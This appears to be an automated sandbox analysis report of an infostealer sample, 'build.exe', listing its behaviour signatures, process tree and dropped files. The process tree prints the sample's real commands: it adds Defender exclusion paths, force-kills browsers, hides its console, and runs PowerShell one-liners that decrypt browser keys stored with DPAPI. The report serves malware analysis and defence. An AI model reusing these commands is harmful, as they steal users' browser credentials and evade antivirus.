Analysis

  • max time kernel
    33s
  • max time network
    45s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260911-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260911-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    25/09/2026, 16:27

General

  • Target
    build.exe
  • Size 68.9MB
  • Sample260925-tx6fsaff48
  • SHA256 b5dbc4b6295e1dd86249cc954bd0d9a4a9ff815ba0237c8b06e7c0af126a19a0
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Discovers running processes 1 TTPs 2 IoCs

    Running process information can be used to identify security tools or plan follow-on actions.

  • Executes a command shell one-liner 1 TTPs 23 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Reads the TCP/IP host and domain name from the registry 1 TTPs 8 IoCs

    The configured hostname and DNS domain identify the machine and are commonly collected to profile a host before it reports in.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 14 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    1⤵
    • Reads the TCP/IP host and domain name from the registry
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\System32\Wbem\wmic.exe
      wmic process get Name,ProcessId,ExecutablePath,CommandLine /format:csv
      2⤵
      • Reads the TCP/IP host and domain name from the registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4340
    • C:\Windows\system32\netstat.exe
      netstat -an
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:5768
    • C:\Windows\system32\reg.exe
      reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v Debugger
      2⤵
        PID:2964
      • C:\Windows\system32\reg.exe
        reg query HKLM\SOFTWARE\Classes\exefile\shell\Debug
        2⤵
        • Modifies registry key
        PID:5144
      • C:\Windows\system32\reg.exe
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        2⤵
        • Modifies registry key
        PID:3520
      • C:\Windows\system32\tasklist.exe
        tasklist /m /fi "PID eq 2140"
        2⤵
        • Discovers running processes
        • Suspicious use of AdjustPrivilegeToken
        PID:3360
      • C:\Windows\System32\Wbem\wmic.exe
        wmic process where ProcessId=4996 get Name,CommandLine,ExecutablePath /format:csv
        2⤵
        • Reads the TCP/IP host and domain name from the registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5556
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -Command " Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); '; $consolePtr = [Console.Window]::GetConsoleWindow(); [Console.Window]::ShowWindow($consolePtr, 0); ""
        2⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:5516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -Command " Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport(\"Kernel32.dll\")] public static extern IntPtr GetConsoleWindow(); [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); '; $consolePtr = [Console.Window]::GetConsoleWindow(); [Console.Window]::ShowWindow($consolePtr, 0); "
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Enumerates connected drives
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5176
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wlk4grrs\wlk4grrs.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4500
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67B9.tmp" "c:\Users\Admin\AppData\Local\Temp\wlk4grrs\CSCCFBF55365CBB46D7B6465319A638DF73.TMP"
              5⤵
                PID:1568
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "net session"
          2⤵
          • Executes a command shell one-liner
          • Suspicious use of WriteProcessMemory
          PID:2872
          • C:\Windows\system32\net.exe
            net session
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2400
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 session
              4⤵
                PID:5636
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:2888
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM chrome.exe
              3⤵
              • Kills process with taskkill
              PID:2604
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:5424
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM msedge.exe
              3⤵
              • Kills process with taskkill
              PID:1372
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM brave.exe"
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:4104
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM brave.exe
              3⤵
              • Kills process with taskkill
              PID:5216
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4'""
            2⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:4240
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4'"
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Enumerates connected drives
              • Suspicious behavior: EnumeratesProcesses
              PID:948
          • C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\dwm_overlay.exe
            C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\dwm_overlay.exe C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\dwm_overlay.exe C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4 C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\output FD0249FBDF88 ilovecats.sbs
            2⤵
            • Executes dropped EXE
            • Reads the TCP/IP host and domain name from the registry
            • Suspicious use of WriteProcessMemory
            PID:3348
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5840
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM chrome.exe
                4⤵
                • Kills process with taskkill
                PID:3496
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:5824
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM msedge.exe
                4⤵
                • Kills process with taskkill
                PID:1092
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM brave.exe"
              3⤵
              • Executes a command shell one-liner
              • Suspicious use of WriteProcessMemory
              PID:2744
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM brave.exe
                4⤵
                • Kills process with taskkill
                PID:1520
            • C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\cache.exe
              C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\cache.exe all -o C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\output -v --no-kill
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:5220
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                4⤵
                  PID:4180
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                  4⤵
                    PID:4324
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\TextFramework\4mry1w'""
                2⤵
                • Executes a command shell one-liner
                • Suspicious use of WriteProcessMemory
                PID:5420
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\TextFramework\4mry1w'"
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Enumerates connected drives
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1540
              • C:\Users\Admin\AppData\Local\TextFramework\4mry1w\wcindex.exe
                C:\Users\Admin\AppData\Local\TextFramework\4mry1w\wcindex.exe FD0249FBDF88
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:4304
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:4360
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    4⤵
                    • Discovers running processes
                    PID:5936
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAONJO+mEEQUCwrj0QnxZ16hAAAAAcAAAARwBvAG8AZwBsAGUAIABDAGgAcgBvAG0AZQAAABBmAAAAAQAAIAAAACHgkuJTN4x1njpGamCWH6802V3sdoEEb6I5HPWtsX2EAAAAAA6AAAAAAgAAIAAAAEQGFCRjbjIGmcfkdunL80/iCbC97bQBIXlgyV9dvfaDMAAAAFrwBZ07jbVuisc98yYQBYMrXKW016TTFG4aQ9oWrPJSznVFWXWA1w69og/xdEFCR0AAAADx8JCyz9++eWpKcfyWr2qJFA3QRRvQHSSFqVxaZsES7kxF0a9yN/nl7mU69/2JyEryLvSimQyGHuvDn6rE8EVJ');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))""
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:5192
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAONJO+mEEQUCwrj0QnxZ16hAAAAAcAAAARwBvAG8AZwBsAGUAIABDAGgAcgBvAG0AZQAAABBmAAAAAQAAIAAAACHgkuJTN4x1njpGamCWH6802V3sdoEEb6I5HPWtsX2EAAAAAA6AAAAAAgAAIAAAAEQGFCRjbjIGmcfkdunL80/iCbC97bQBIXlgyV9dvfaDMAAAAFrwBZ07jbVuisc98yYQBYMrXKW016TTFG4aQ9oWrPJSznVFWXWA1w69og/xdEFCR0AAAADx8JCyz9++eWpKcfyWr2qJFA3QRRvQHSSFqVxaZsES7kxF0a9yN/nl7mU69/2JyEryLvSimQyGHuvDn6rE8EVJ');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Enumerates connected drives
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3436
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAONJO+mEEQUCwrj0QnxZ16hAAAAAeAAAATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlAAAAEGYAAAABAAAgAAAAWLEYAgfRhH/UxKFnk8/DVXf9E/RUOmq3jzMbPNIL+04AAAAADoAAAAACAAAgAAAAeLyzaru8DZdlU/u6cjsstOw/8LMzjfgZ9f9kdLg+F3QwAAAAJ7pREMuFD8Kw4ox0nUibkf0LdL218QWa9JR1ysXIhB23BU0efgYGE8b2A3XeFtxYQAAAAG4s0clyHdr472jV27ZFzL8dbf4j0VLMN/Le/MigXgfuEtMrxq0AnlrE3oiKWD2ApS3+nWHcFI+qWZAwe3of8gA=');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))""
                  3⤵
                  • Executes a command shell one-liner
                  PID:4152
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAONJO+mEEQUCwrj0QnxZ16hAAAAAeAAAATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlAAAAEGYAAAABAAAgAAAAWLEYAgfRhH/UxKFnk8/DVXf9E/RUOmq3jzMbPNIL+04AAAAADoAAAAACAAAgAAAAeLyzaru8DZdlU/u6cjsstOw/8LMzjfgZ9f9kdLg+F3QwAAAAJ7pREMuFD8Kw4ox0nUibkf0LdL218QWa9JR1ysXIhB23BU0efgYGE8b2A3XeFtxYQAAAAG4s0clyHdr472jV27ZFzL8dbf4j0VLMN/Le/MigXgfuEtMrxq0AnlrE3oiKWD2ApS3+nWHcFI+qWZAwe3of8gA=');$p=[System.Security.Cryptography.ProtectedData]::Unprotect($b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);[Console]::Out.Write([Convert]::ToBase64String($p))"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:1932
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:3776
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM chrome.exe
                    4⤵
                    • Kills process with taskkill
                    PID:1576
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:1304
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM msedge.exe
                    4⤵
                    • Kills process with taskkill
                    PID:2724
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM brave.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:4072
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM brave.exe
                    4⤵
                    • Kills process with taskkill
                    PID:800
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM firefox.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5512
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM firefox.exe
                    4⤵
                    • Kills process with taskkill
                    PID:3288
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM opera.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:2820
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM opera.exe
                    4⤵
                    • Kills process with taskkill
                    PID:2932
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM kometa.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:5612
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM kometa.exe
                    4⤵
                    • Kills process with taskkill
                    PID:1264
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM orbitum.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:1400
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM orbitum.exe
                    4⤵
                    • Kills process with taskkill
                    PID:4488
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM centbrowser.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:428
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM centbrowser.exe
                    4⤵
                    • Kills process with taskkill
                    PID:684
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM 7star.exe"
                  3⤵
                  • Executes a command shell one-liner
                  PID:4252
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PickerHost\lhehp3'""
                2⤵
                • Executes a command shell one-liner
                • Suspicious use of WriteProcessMemory
                PID:4532
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PickerHost\lhehp3'"
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5144

            Network

                  MITRE ATT&CK Enterprise v16

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  node.napi.node

                  • Path C:\Users\Admin\.cache\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\datavault-win\prebuilds\win32-x64\node.napi.node
                  • Size 137KB
                  • SHA256 da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd
                  • MD5 SHA1 SHA512 SSDEEP TLSH

                  node_sqlite3.node

                  • Path C:\Users\Admin\.cache\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
                  • Size 1.8MB
                  • SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
                  • MD5 SHA1 SHA512 SSDEEP TLSH

                  cache.exe

                  • Path C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\cache.exe
                  • Size 1.8MB
                  • SHA256 a3870c485b350542231baca4a670099560f00ff1c92580880ae12ffb5d5d92c5
                  • MD5 SHA1 SHA512 SSDEEP TLSH

                  dwm_overlay.exe

                  • Path C:\Users\Admin\AppData\Local\MediaOverlay\1p35u4\dwm_overlay.exe
                  • Size 43.2MB
                  • SHA256 99b50278706d427ab686266534b28e7c4e9b596f3dca4dfa88ca51190402f79a
                  • MD5 SHA1 SHA512 SSDEEP TLSH

                  StartupProfileData-NonInteractive

                  • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • Size 1KB
                  • SHA256 3e02314a68c7a782f52193fe681b52b09da67ad1434ea988343c2983aa512f43
                  • MD5 SHA1 SHA512 TLSH

                  StartupProfileData-NonInteractive

                  • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • Size 1KB
                  • SHA256 14edce9919da7c44991f499f0ed0a50082cbabc66a9a624fd209ec255d4e77ec
                  • MD5 SHA1 SHA512 TLSH

                  StartupProfileData-NonInteractive

                  • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • Size 1KB
                  • SHA256 58a501df1116d1fe605606f9c77a8e35adeb6d7c636902510b1550d663530369
                  • MD5 SHA1 SHA512 TLSH

                  StartupProfileData-NonInteractive

                  • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • Size 1KB
                  • SHA256 3674b90c1caf1df47ef6cdfcff99b7987586cab16fe77bbe8318ca09a0cd9a77
                  • MD5 SHA1 SHA512 TLSH

                  StartupProfileData-NonInteractive

                  • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  • Size 1KB
                  • SHA256 e56f4a38e0c60f0196c589e1952198368a10927e65ff24d1476ffafc489657f4
                  • MD5 SHA1 SHA512 TLSH

                  RES67B9.tmp

                  • Path C:\Users\Admin\AppData\Local\Temp\RES67B9.tmp
                  • Size 1KB
                  • SHA256 6296f9eff697b1c14e873831011240a291a49296301d207bce0eb722f3766a49
                  • MD5 SHA1 SHA512 TLSH

                  __PSScriptPolicyTest_pqr1bpan.0s5.ps1

                  • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqr1bpan.0s5.ps1
                  • Size 60B
                  • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                  • MD5 SHA1 SHA512 TLSH

                  msync.dat

                  • Path C:\Users\Admin\AppData\Local\Temp\msync.dat
                  • Size 33B
                  • SHA256 70d619c4b5e74df95bbaa24833e40dc4d1cbdd2ec564bedff94a5277c7fcc341
                  • MD5 SHA1 SHA512

                  wlk4grrs.dll

                  • Path C:\Users\Admin\AppData\Local\Temp\wlk4grrs\wlk4grrs.dll
                  • Size 3KB
                  • SHA256 0bdd5706f752e5d955dc65b9e292f937caa754c42a182e24d1f477723bf96fdc
                  • MD5 SHA1 SHA512 TLSH

                  CSCCFBF55365CBB46D7B6465319A638DF73.TMP

                  • Path \??\c:\Users\Admin\AppData\Local\Temp\wlk4grrs\CSCCFBF55365CBB46D7B6465319A638DF73.TMP
                  • Size 652B
                  • SHA256 c3c4e1f2bb0e6a9a0b39f62ab77479de0dbe7b2f2db370dd6bcf983d462f165f
                  • MD5 SHA1 SHA512 TLSH

                  wlk4grrs.0.cs

                  • Path \??\c:\Users\Admin\AppData\Local\Temp\wlk4grrs\wlk4grrs.0.cs
                  • Size 312B
                  • SHA256 a5c3410c34e03d37491bd44c462beb054179cb6b34c53649fed031c59c2e4123
                  • MD5 SHA1 SHA512 TLSH

                  wlk4grrs.cmdline

                  • Path \??\c:\Users\Admin\AppData\Local\Temp\wlk4grrs\wlk4grrs.cmdline
                  • Size 369B
                  • SHA256 a974f149f6be3189876ad7982933d53e80bbf8ff609e1242593ec4c724cdcdd0
                  • MD5 SHA1 SHA512 TLSH

                  memory/948-51-0x000002071D560000-0x000002071D56A000-memory.dmp

                  memory/948-50-0x000002071D190000-0x000002071D242000-memory.dmp

                  memory/948-49-0x000002071D170000-0x000002071D18E000-memory.dmp

                  memory/3436-126-0x0000020B7A7C0000-0x0000020B7A810000-memory.dmp

                  memory/5144-130-0x000001A774D60000-0x000001A774E12000-memory.dmp

                  memory/5176-34-0x0000019162FC0000-0x0000019162FC8000-memory.dmp

                  memory/5176-19-0x00000191635A0000-0x00000191635C2000-memory.dmp